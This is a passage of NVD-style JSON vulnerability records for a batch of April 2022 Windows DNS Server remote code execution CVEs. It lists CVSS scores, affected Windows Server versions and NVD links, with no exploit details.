"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26812", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:23:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26812", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:09", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26815", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:14:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", 
"cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26815", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:09", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26814", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T20:15:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26814", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26814", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26818", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:56:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26818", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26818", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26822", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", 
"CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:47:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26822", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26822", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:standard:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26817", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:56:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26817", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26817", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26823", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", 
"CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:47:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26823", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:10", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26819", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:56:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2022-26819", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26819", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:11", "description": "Windows DNS Server Remote Code Execution Vulnerability. 
This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26824, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26825", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:24:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26825", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26825", "cvss": {"score": 9.0, 
"vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:11", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26811, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26823, CVE-2022-26825, CVE-2022-26826, CVE-2022-26829.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-26824", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24536", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", 
"CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26829"], "modified": "2022-04-18T19:47:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:20h2"], "id": "CVE-2022-26824", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26824", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:34:08", "description": "Windows DNS Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24536, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, 